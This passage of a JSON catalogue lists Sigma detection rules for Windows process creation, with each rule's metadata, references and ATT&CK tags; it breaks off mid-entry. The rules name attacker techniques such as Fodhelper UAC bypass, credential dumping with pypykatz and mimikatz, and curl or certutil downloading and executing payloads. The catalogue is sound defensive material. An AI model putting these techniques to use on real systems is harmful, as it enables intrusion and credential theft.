"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml" ], "tags": [ "attack.t1036", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", "value": "Suspicious CodePage Switch Via CHCP" }, { "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of fodhelper.exe utility by legitimate user" ], "filename": "proc_creation_win_uac_bypass_fodhelper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "value": "Bypass UAC via Fodhelper.exe" }, { "description": "Detects creation of a scheduled task with a GUID like name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Legitimate software naming their tasks as GUIDs" ], "filename": "proc_creation_win_schtasks_guid_task_name.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "value": "Suspicious Scheduled Task Name As GUID" }, { "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_pypykatz.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", "https://github.com/skelsec/pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", "value": "HackTool - Pypykatz Credentials Dumping Activity" }, { "description": "Detects the PowerShell command lines with special characters", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "creation_date": "2020-10-15", "falsepositive": [ "Amazon SSM Document Worker", "Windows Defender ATP" ], "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1027", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "value": "Potential PowerShell Command Line Obfuscation" }, { "description": "Detects execution of regsvr32 where the DLL is located in a highly suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-26", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_regsvr32_susp_exec_path_2.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "327ff235-94eb-4f06-b9de-aaee571324be", "value": "Regsvr32 Execution From Highly Suspicious Location" }, { "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_win_pua_nmap_zenmap.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", "https://nmap.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "value": "PUA - Nmap/Zenmap Execution" }, { "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", "meta": { "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-13", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_manage_bde.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", "https://twitter.com/bohops/status/980659399495741441", "https://twitter.com/JohnLaTwC/status/1223292479270600706", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", "value": "Potential Manage-bde.wsf Abuse To Proxy Execution" }, { "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "creation_date": "2019-09-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", "value": "Suspicious Debugger Registration Cmdline" }, { "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b0524451-19af-4efa-a46f-562a977f792e", "value": "ShimCache Flush" }, { "description": "Detects commands that temporarily turn off Volume Snapshots", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-28", "falsepositive": [ "Legitimate administration" ], "filename": "proc_creation_win_reg_volsnap_disable.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1354766164166115331", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "value": "Disabled Volume Snapshots" }, { "description": "Detects the execution of \"DXCap.EXE\" with the \"-c\" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.\n", "meta": { "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Legitimate execution of dxcap.exe by legitimate user" ], "filename": "proc_creation_win_dxcap_arbitrary_binary_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", "https://twitter.com/harr0ey/status/992008180904419328", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dxcap_arbitrary_binary_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60f16a96-db70-42eb-8f76-16763e333590", "value": "New Capture Session Launched Via DXCap.EXE" }, { "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", "meta": { "author": "Eli Salem, Sander Wiebing, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regini_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "value": "Suspicious Registry Modification From ADS Via Regini.EXE" }, { "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-01-16", "falsepositive": [ "High" ], "filename": "proc_creation_win_cmd_http_appdata.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml" ], "tags": [ "attack.execution", "attack.command-and-control", "attack.t1059.003", "attack.t1059.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", "value": "Command Line Execution with Suspicious URL and AppData Strings" }, { "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-31", "falsepositive": [ "Installation of unsigned packages for testing purposes" ], "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://twitter.com/WindowsDocs/status/1620078135080325122", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", "value": "Unsigned AppX Installation Attempt Using Add-AppxPackage" }, { "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", "meta": { "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-01-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "value": "Curl Download And Execute Combination" }, { "description": "Detects potential \"ShellDispatch.dll\" functionality abuse to execute arbitrary binaries via \"ShellExecute\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_shelldispatch_potential_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": "82343930-652f-43f5-ab70-2ee9fdd6d5e9", "value": "Potential ShellDispatch.DLL Functionality Abuse" }, { "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_JohnHammond/status/1708910264261980634", "https://twitter.com/egre55/status/1087685529016193025", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "value": "Suspicious File Downloaded From Direct IP Via Certutil.EXE" }, { "description": "Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wscript_cscript_uncommon_extension_exec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99b7460d-c9f1-40d7-a316-1f36f61d52ee", "value": "Cscript/Wscript Uncommon Script Extension Execution" }, { "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "meta": { "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "creation_date": "2019-06-15", "falsepositive": [ "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", "https://twitter.com/christophetd/status/1164506034720952320", "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003", "car.2013-05-009" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "value": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries" }, { "description": "Detects the removal or uninstallation of an application via \"Wmic.EXE\".", "meta": { "author": "frack113", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_uninstall_application.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", "value": "Application Removed Via Wmic.EXE" }, { "description": "Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.\nThis could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.\n", "meta": { "author": "Sreeman", "creation_date": "2021-06-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "value": "Write Protect For Storage Disabled" }, { "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_public_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mandiant.com/resources/evolution-of-fin7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", "value": "Execution of Powershell Script in Public Folder" }, { "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-29", "falsepositive": [ "Legitimate usage of the features listed in the rule." ], "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "value": "Potential Suspicious Windows Feature Enabled - ProcCreation" }, { "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "value": "File With Suspicious Extension Downloaded Via Bitsadmin" }, { "description": "Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-09-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_curl.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Kostastsale/status/1700965142828290260", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_curl.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7530cd3d-7671-43e3-b209-976966f6ea48", "value": "Renamed CURL.EXE Execution" }, { "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-06", "falsepositive": [ "Software Installers" ], "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "value": "Use NTFS Short Name in Image" }, { "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-01-29", "falsepositive": [ "Administrative script libraries" ], "filename": "proc_creation_win_powershell_frombase64string.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" ], "tags": [ "attack.t1027", "attack.defense-evasion", "attack.t1140", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", "value": "Base64 Encoded PowerShell Command Detected" }, { "description": "Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.\nAttackers might abuse this in order to bypass application whitelisting.\n", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2019-10-26", "falsepositive": [ "Legitimate use of dnx.exe by legitimate user" ], "filename": "proc_creation_win_dnx_execute_csharp_code.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnx_execute_csharp_code.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "value": "Potential Application Whitelisting Bypass via Dnx.EXE" }, { "description": "Detection well-known mimikatz command line arguments", "meta": { "author": "Teymur 